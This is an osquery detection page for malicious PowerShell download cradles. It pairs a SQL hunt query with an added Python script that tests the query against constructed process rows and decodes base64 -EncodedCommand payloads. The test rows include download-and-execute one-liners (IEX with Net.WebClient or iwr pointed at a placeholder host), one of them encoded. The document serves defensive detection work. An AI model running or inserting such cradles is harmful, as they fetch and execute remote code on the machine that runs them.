Built on the open source project osquery.
Description: Detecting malicious PowerShell.
What The Data Shows: powershell.exe command lines that combine three substrings commonly seen in download cradles: "enc" (the -EncodedCommand switch, or [Text.Encoding] in a decode-and-run one-liner), "IEX" (Invoke-Expression) and "web" (Net.WebClient, Invoke-WebRequest). osquery evaluates SQL with SQLite, where LIKE is case-insensitive for ASCII, so the patterns also match "-Enc" and "iex". Because the three conditions are ANDed, the query only fires when all three strings are visible on the command line: a launch whose cradle is hidden inside an -EncodedCommand base64 payload, or a plaintext cradle that never mentions "enc", will not match, and the name filter ignores pwsh.exe (PowerShell 7). Treat it as a high-precision, low-recall hunt and pair it with a check for the encoded-command switch on its own.
SQL:
SELECT *
FROM processes
WHERE cmdline LIKE '%enc%'
AND cmdline LIKE '%IEX%'
AND cmdline LIKE '%web%'
AND name = 'powershell.exe'
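To see what the query above actually flags, the following Python script is an added example (it is not part of the original page and not osquery's own code): it loads constructed process rows into an in-memory SQLite table with the same column names as osquery's processes table, runs the page's query with single-quoted string literals, and runs an added triage variant that scores each indicator separately, accepts pwsh.exe, and treats the encoded-command switch as an indicator on its own. It also decodes an -EncodedCommand payload so the hidden cradle can be seen. The sample command lines, the host name t, and the -e/-ec/-en prefix matching used to spot -EncodedCommand abbreviations are assumptions made for the example.

```python
"""Replay the page's osquery detection against constructed process rows.

osquery serves its tables through SQLite, so an in-memory sqlite3 table with the
same column names shows what the query matches and what it misses. Every row
below is constructed for this example; none is real telemetry.
"""
import base64
import sqlite3


def encoded_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand payload, or None if the command
    line carries none. The -e / -ec / -en... abbreviations are an assumption."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        low = tok.lower()
        if low in ("-e", "-ec") or low.startswith("-en"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except ValueError:  # not base64 / not UTF-16LE: treat as no payload
                return None
    return None


# Constructed rows standing in for osquery's processes table (pid, name, cmdline).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://t/a')"
SAMPLE_PROCESSES = [
    # encoded launch: IEX and the download cradle are hidden inside the base64
    (1001, "powershell.exe", "powershell.exe -NoP -w hidden -enc " + encoded_command("IEX (iwr http://t/a)")),
    # plaintext cradle with no 'enc' anywhere on the command line
    (1002, "powershell.exe", "powershell.exe -ExecutionPolicy Bypass -c " + CRADLE),
    # plaintext cradle that mentions [Text.Encoding]: the shape the page's query matches
    (1003, "powershell.exe", "powershell.exe -c IEX ([Text.Encoding]::UTF8.GetString("
                             "(New-Object Net.WebClient).DownloadData('http://t/a')))"),
    # same cradle under PowerShell 7, which the page's name filter ignores
    (1004, "pwsh.exe", "pwsh.exe -c " + CRADLE),
    # benign scheduled script
    (1005, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
]

# The page's query, with single-quoted string literals (SQLite treats double
# quotes as identifiers first and only falls back to a string literal).
ORIGINAL_QUERY = """
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%enc%'
  AND cmdline LIKE '%IEX%'
  AND cmdline LIKE '%web%'
  AND name = 'powershell.exe'
"""

# Added triage variant (not from the page): each indicator is a separate column,
# pwsh.exe is included, and the encoded-command switch alone is enough to flag,
# because an -EncodedCommand payload hides IEX and the cradle in base64.
TRIAGE_QUERY = """
SELECT pid, name, cmdline, has_encoded, has_iex, has_download
FROM (
  SELECT pid, name, cmdline,
         (cmdline LIKE '% -e %' OR cmdline LIKE '% -ec %'
          OR cmdline LIKE '% -en%')                                   AS has_encoded,
         (cmdline LIKE '%iex%' OR cmdline LIKE '%invoke-expression%') AS has_iex,
         (cmdline LIKE '%webclient%' OR cmdline LIKE '%downloadstring%'
          OR cmdline LIKE '%downloadfile%' OR cmdline LIKE '%iwr%'
          OR cmdline LIKE '%invoke-webrequest%' OR cmdline LIKE '%http%') AS has_download
  FROM processes
  WHERE LOWER(name) IN ('powershell.exe', 'pwsh.exe', 'powershell_ise.exe')
)
WHERE has_encoded OR (has_iex AND has_download)
"""


def build_sample_db() -> sqlite3.Connection:
    """Create an in-memory processes table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE processes (pid INTEGER, name TEXT, cmdline TEXT)")
    conn.executemany("INSERT INTO processes VALUES (?, ?, ?)", SAMPLE_PROCESSES)
    return conn


def matched_pids(query: str) -> list:
    """Run a query against the constructed table and return the pids it flags."""
    conn = build_sample_db()
    try:
        return sorted(row[0] for row in conn.execute(query))
    finally:
        conn.close()


if __name__ == "__main__":
    print("page query  :", matched_pids(ORIGINAL_QUERY))  # [1003]
    print("triage query:", matched_pids(TRIAGE_QUERY))    # [1001, 1002, 1003, 1004]
    for pid, _, cmdline in SAMPLE_PROCESSES:
        payload = decode_encoded_command(cmdline)
        if payload:
            print(f"pid {pid} decoded -EncodedCommand: {payload}")
```

The page's query flags only the row whose plaintext one-liner happens to contain "Encoding", "IEX" and "WebClient" together; the encoded launch, the plain cradle and the pwsh.exe launch all slip through. The triage variant trades precision for recall, so expect to tune the has_download patterns (in particular '%http%') against your own baseline of legitimate PowerShell usage before alerting on it.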
Copyright © 2005-2023 Broadcom. All Rights Reserved. The term “Broadcom” refers to Broadcom Inc. and/or its subsidiaries.